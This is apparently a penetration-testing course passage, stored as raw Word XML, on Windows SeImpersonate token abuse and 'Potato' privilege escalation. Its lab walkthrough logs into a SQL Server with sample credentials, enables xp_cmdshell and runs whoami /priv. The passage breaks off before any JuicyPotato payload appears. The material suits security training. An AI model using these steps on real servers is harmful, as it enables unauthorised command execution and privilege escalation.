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709B" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate and SeAssignPrimaryToken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497D1B6" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="138C0EAD">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F550012"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In Windows, every process has a token that has information about the account that is running it. These tokens are not considered secure resources, as they are just locations within memory that could be brute-forced by users that cannot read memory. To utilize the token, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege is needed. It is only given to administrative accounts, and in most cases, can be removed during system hardening. An example of using this token would be </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>CreateProcessWithTokenW</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF07AEC"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Legitimate programs may utilize another process's token to escalate from Administrator to Local System, which has additional privileges. Processes generally do this by making a call to the WinLogon process to get a SYSTEM token, then executing itself with that token placing it within the SYSTEM space. Attackers often abuse this privilege in the "Potato style" privescs - where a service account can </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>, but not obtain full SYSTEM level privileges. Essentially, the Potato attack tricks a process running as SYSTEM to connect to their process, which hands over the token to be used.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8750C"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We will often run into this privilege after gaining remote code execution via an application that runs in the context of a service account (for example, uploading a web shell to an ASP.NET web application, achieving remote code execution through a Jenkins installation, or by executing commands through MSSQL queries). Whenever we gain access in this way, we should immediately check for this privilege as its presence often offers a quick and easy route to elevated privileges. This </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>paper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is worth reading for further details on token impersonation attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579F0182" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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pict w14:anchorId="7F1BC1A2">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A09C241" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>SeImpersonate Example - JuicyPotato</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336DEBEA"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Let's take the example below, where we have gained a foothold on a SQL server using a privileged SQL user. Client connections to IIS and SQL Server may be configured to use Windows Authentication. The server may then need to access other resources such as file shares as the connecting client. It can be done by impersonating the user whose context the client connection is established. To do so, the service account will be granted the </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>Impersonate a client after authentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> privilege.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B00419B"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In this scenario, the SQL Service service account is running in the context of the default </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mssqlserver</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> account. Imagine we have achieved command execution as this user using </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> using a set of credentials obtained in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>logins.sql</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> file on a file share using the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Snaffler</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1A9BA" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Connecting with MSSQLClient.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33393D48"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Using the credentials </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>sql_dev:Str0ng_P@ssw0rd!</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">, let's first connect to the SQL server instance and confirm our privileges. We can do this using </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>mssqlclient.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Impacket</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> toolkit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F0BE9C" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Connecting with MSSQLClient.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD3D23"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yovecio@htb[/htb]$ mssqlclient.py sql_dev@10.129.43.30 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAF5915"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4F94DB9"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Impacket v0.9.22.dev1+20200929.152157.fe642b24 - Copyright 2020 SecureAuth Corporation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B279CE8"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9BB3CEF"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Password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1D6FB1"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Encryption required, switching to TLS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2752D575"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ENVCHANGE(DATABASE): Old Value: master, New Value: master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD3C298"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ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DD19EE"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ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6238C20F"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INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed database context to 'master'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679AA4B"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INFO(WINLPE-SRV01\SQLEXPRESS01): Line 1: Changed language setting to us_english.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7486C7D9"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 ACK: Result: 1 - Microsoft SQL Server (130 19162) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ADD068"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Press help for extra shell commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34211A4C"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SQL&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FA9A77" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Enabling xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D04C4A9"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Next, we must enable the </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored procedure to run operating system commands. We can do this via the Impacket MSSSQL shell by typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>enable_xp_cmdshell</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. Typing </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>help</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> displays a few other command options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF963EE" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Enabling xp_cmdshell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7B87D0"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SQL&gt; enable_xp_cmdshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16150D"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C324913"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INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="002A1DF8"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INFO(WINLPE-SRV01\SQLEXPRESS01): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACC722E"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Note: We don't actually have to type </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>RECONFIGURE</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> as Impacket does this for us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40454CAB" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Confirming Access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9B0B05"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With this access, we can confirm that we are indeed running in the context of a SQL Server service account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0002A2ED" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Confirming Access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003104FD"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SQL&gt; xp_cmdshell whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73991BCD"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3CC707F"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output                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65048A7B"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A41826C"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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E355F19"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08E1149"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nt service\mssql$sqlexpress01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0539D0C6" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">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91DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Checking Account Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160AF8B3"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Next, let's check what privileges the service account has been granted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3AA6B" w14:textId="77777777" w:rsidR="00291DE9" w:rsidRPr="00291DE9" w:rsidRDefault="00291DE9" w:rsidP="00291DE9">
      <w:pPr>
        <w:spacing w:after="0"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Checking Account Privileges </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DD97F9"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lastRenderedPageBreak/>
        <w:t>SQL&gt; xp_cmdshell whoami /priv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1C01C7"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C7CEC5D"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output                                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8460AE"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47DFC8F"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   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404EAB7A"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                                                                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251543A2"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PRIVILEGES INFORMATION                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD06F4D"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64AA175"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                                                             </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3820E018"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Privilege Name                Description                               State      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6041C358"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5F003E0"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 ========================================= ========   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D17A58"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64F773B"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SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719DF69C"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SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AB941"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SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A71D2BF"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SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BAEC4F3"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SeImpersonatePrivilege        Impersonate a client after authentication Enabled    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC676C5"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SeCreateGlobalPrivilege       Create global objects                     Enabled    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC72AE5"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SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C59065"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The command </w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>whoami /priv</w:t>
      </w:r>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> confirms that </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00291DE9">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>SeImpersonatePrivilege</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00291DE9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-SE" w:eastAsia="en-SE"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
